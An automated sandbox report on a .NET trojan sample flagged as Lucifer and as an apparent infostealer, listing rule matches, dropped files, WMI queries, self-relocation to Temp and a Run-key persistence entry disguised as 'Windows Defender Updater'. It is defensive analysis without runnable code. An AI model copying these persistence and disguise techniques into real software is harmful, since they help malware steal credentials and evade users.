                  Source: nwY3YpWQVx.exe, type: SAMPLEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                  Source: 1.0.Zip.exe.1c391990000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                  Source: 0.2.nwY3YpWQVx.exe.2b1b350.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                  Source: 0.0.nwY3YpWQVx.exe.695ae8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                  Source: 0.0.nwY3YpWQVx.exe.695ae8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                  Source: 0.0.nwY3YpWQVx.exe.630000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                  Source: 0.0.nwY3YpWQVx.exe.630000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                  Source: 0.0.nwY3YpWQVx.exe.632203.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                  Source: 0.0.nwY3YpWQVx.exe.632203.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                  Source: 7.2.update_222410.exe.12bb0ca8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                  Source: 7.2.update_222410.exe.12bb0ca8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                  Source: 7.2.update_222410.exe.12b4cdc0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                  Source: 7.2.update_222410.exe.12b4cdc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                  Source: 00000001.00000000.338062732.000001C391992000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                  Source: 00000000.00000000.294533919.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                  Source: 00000000.00000002.563811537.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                  Source: 00000007.00000002.397751643.0000000012B4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exe, type: DROPPEDMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeCode function: 0_2_00007FF9A63B41C00_2_00007FF9A63B41C0
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeCode function: 0_2_00007FF9A63BA2830_2_00007FF9A63BA283
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeCode function: 0_2_00007FF9A63BEB810_2_00007FF9A63BEB81
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeCode function: 0_2_00007FF9A63BD68D0_2_00007FF9A63BD68D
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeCode function: 0_2_00007FF9A63C2CF60_2_00007FF9A63C2CF6
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeCode function: 0_2_00007FF9A63C3AA20_2_00007FF9A63C3AA2
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeCode function: 1_2_00007FF9A63D2D261_2_00007FF9A63D2D26
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeCode function: 1_2_00007FF9A63D3AD21_2_00007FF9A63D3AD2
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeCode function: 7_2_00007FF9A63C2CF67_2_00007FF9A63C2CF6
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeCode function: 7_2_00007FF9A63B35107_2_00007FF9A63B3510
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeCode function: 7_2_00007FF9A63C3AA27_2_00007FF9A63C3AA2
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeCode function: 7_2_00007FF9A63B42AE7_2_00007FF9A63B42AE
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeCode function: 7_2_00007FF9A63BA2837_2_00007FF9A63BA283
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeCode function: 12_2_00007FF9A63BA28312_2_00007FF9A63BA283
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeCode function: 12_2_00007FF9A63BEB8112_2_00007FF9A63BEB81
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeCode function: 12_2_00007FF9A63BD68D12_2_00007FF9A63BD68D
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeCode function: 12_2_00007FF9A63C3AA212_2_00007FF9A63C3AA2
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeCode function: 12_2_00007FF9A63C2CF612_2_00007FF9A63C2CF6
                  Source: nwY3YpWQVx.exe, 00000000.00000000.294533919.0000000000632000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll4 vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exe, 00000000.00000000.294533919.0000000000632000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZip.exe( vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exe, 00000000.00000002.560578266.0000000000BC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,\\StringFileInfo\\040904B0\\OriginalFilename vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Remoting.dllT vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.Extensions.dllT vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,\\StringFileInfo\\000004B0\\OriginalFilename vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.dllT vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Management.dllT vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCustomMarshalers.dllT vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exe, 00000000.00000002.570917799.0000000012B62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameupdate_windows10.exeD vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exe, 00000000.00000000.294604491.00000000006B6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameupdate_windows10.exeD vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exe, 00000000.00000002.563811537.0000000002B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZip.exe( vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exeBinary or memory string: OriginalFilenameNewtonsoft.Json.dll4 vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exeBinary or memory string: OriginalFilenameZip.exe( vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exeBinary or memory string: OriginalFilenameupdate_windows10.exeD vs nwY3YpWQVx.exe
                  Source: nwY3YpWQVx.exeReversingLabs: Detection: 88%
                  Source: nwY3YpWQVx.exeVirustotal: Detection: 73%
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeFile read: C:\Users\user\Desktop\nwY3YpWQVx.exeJump to behavior
                  Source: nwY3YpWQVx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\nwY3YpWQVx.exe C:\Users\user\Desktop\nwY3YpWQVx.exe
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess created: C:\Users\user\AppData\Local\Temp\Zip.exe "C:\Users\user\AppData\Local\Temp\Zip.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\update_222410.exe "C:\Users\user\AppData\Local\Temp\update_222410.exe" / start
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\update_222410.exe "C:\Users\user\AppData\Local\Temp\update_222410.exe" / start
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\update_222410.exe "C:\Users\user\AppData\Local\Temp\update_222410.exe" / start
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\update_222410.exe "C:\Users\user\AppData\Local\Temp\update_222410.exe" / start
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess created: C:\Users\user\AppData\Local\Temp\Zip.exe "C:\Users\user\AppData\Local\Temp\Zip.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeFile created: C:\Users\user\Desktop\Newtonsoft.Json.dllJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeFile created: C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dllJump to behavior
                  Source: classification engineClassification label: mal93.troj.spyw.winEXE@7/10@10/2
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: nwY3YpWQVx.exe, 00000000.00000002.563192025.0000000002A93000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571228200.0000000012E2F000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.563234007.0000000002A9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: nwY3YpWQVx.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.69%
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeMutant created: \Sessions\1\BaseNamedObjects\update_windows10
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeAutomated click: Continue
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeAutomated click: Continue
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: nwY3YpWQVx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: nwY3YpWQVx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: nwY3YpWQVx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: System.Windows.Forms.pdbwY3YpWQVx.exe' source: nwY3YpWQVx.exe, 00000000.00000002.573995000.000000001B98E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.pdb source: nwY3YpWQVx.exe, 00000000.00000002.573995000.000000001B98E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: nwY3YpWQVx.exe, 00000000.00000002.573995000.000000001B98E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \gom_v_4.0\Zip\Zip\obj\Debug\Zip.pdb source: nwY3YpWQVx.exe, Zip.exe.0.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb, source: nwY3YpWQVx.exe, 00000000.00000002.573941215.000000001B983000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbM8( source: nwY3YpWQVx.exe, 00000000.00000002.585222189.000000002023F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: c:\Temp\Json\Working\Newtonsoft.Json\Src\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: nwY3YpWQVx.exe, Newtonsoft.Json.dll0.0.dr, Newtonsoft.Json.dll.0.dr
                  Source: Binary string: \gom_v_4.0\update_windows10\update_windows10\obj\Debug\update_windows10.pdb source: nwY3YpWQVx.exe
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeCode function: 0_2_00007FF9A63B6199 pushad ; ret 0_2_00007FF9A63B61CD
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeCode function: 0_2_00007FF9A63B81DE push eax; ret 0_2_00007FF9A63B81ED
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeCode function: 0_2_00007FF9A63B81AE pushad ; ret 0_2_00007FF9A63B81DD
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeCode function: 1_2_00007FF9A63D7313 push ebx; iretd 1_2_00007FF9A63D731A
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeCode function: 1_2_00007FF9A63C721E pushad ; iretd 1_2_00007FF9A63C724D
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeCode function: 1_2_00007FF9A63C724E push eax; iretd 1_2_00007FF9A63C725D
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeCode function: 7_2_00007FF9A63B6199 pushad ; ret 7_2_00007FF9A63B61CD
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeCode function: 7_2_00007FF9A63B81AE pushad ; ret 7_2_00007FF9A63B81DD
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeCode function: 7_2_00007FF9A63B761E pushad ; retf 7_2_00007FF9A63B764D
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeCode function: 7_2_00007FF9A63B764E push eax; retf 7_2_00007FF9A63B765D
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeCode function: 7_2_00007FF9A63B81DE push eax; ret 7_2_00007FF9A63B81ED
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeCode function: 12_2_00007FF9A63B6199 pushad ; ret 12_2_00007FF9A63B61CD
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeCode function: 12_2_00007FF9A63B81DE push eax; ret 12_2_00007FF9A63B81ED
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeCode function: 12_2_00007FF9A63B81AE pushad ; ret 12_2_00007FF9A63B81DD
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeFile created: C:\Users\user\Desktop\Newtonsoft.Json.dllJump to dropped file
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeFile created: C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dllJump to dropped file
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeFile created: C:\Users\user\AppData\Local\Temp\Zip.exeJump to dropped file
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender UpdaterJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender UpdaterJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Moves itself to temp directory
                  Source: c:\users\user\desktop\nwy3ypwqvx.exeFile moved: C:\Users\user\AppData\Local\Temp\update_222410.exeJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
